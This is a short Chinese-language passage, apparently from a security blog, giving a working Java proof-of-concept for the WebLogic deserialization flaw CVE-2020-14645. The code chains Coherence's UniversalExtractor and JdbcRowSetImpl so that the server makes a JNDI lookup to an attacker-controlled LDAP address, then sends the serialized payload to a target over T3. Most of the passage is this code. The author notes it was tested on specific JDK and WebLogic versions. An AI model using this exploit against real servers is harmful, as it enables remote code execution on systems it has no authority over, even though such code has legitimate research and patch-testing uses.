UniversalExtractor任意调用get、is方法导致JNDI注入。
1package com.supeream;
2
3import com.sun.rowset.JdbcRowSetImpl;
4import com.supeream.serial.Reflections;
5import com.supeream.serial.Serializables;
6import com.supeream.weblogic.T3ProtocolOperation;
7import com.tangosol.util.comparator.ExtractorComparator;
8import com.tangosol.util.extractor.UniversalExtractor;
9
10import java.util.PriorityQueue;
11
12public class CVE_2020_14645 {
13 public static void main(String[] args) throws Exception {
14 // CVE_2020_14645
15 UniversalExtractor extractor = new UniversalExtractor("getDatabaseMetaData()", null, 1);
16 final ExtractorComparator comparator = new ExtractorComparator(extractor);
17
18 JdbcRowSetImpl rowSet = new JdbcRowSetImpl();
19 rowSet.setDataSourceName("ldap://172.16.2.1:1389/#Calc");
20 final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
21
22 Object[] q = new Object[]{rowSet, rowSet};
23 Reflections.setFieldValue(queue, "queue", q);
24 Reflections.setFieldValue(queue, "size", 2);
25 byte[] payload = Serializables.serialize(queue);
26 T3ProtocolOperation.send("172.16.2.132", "7001", payload);
27 }
28}
Test on jdk8u121 weblogic12.2.1.4
由此拓展CVE-2020-14625。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
评论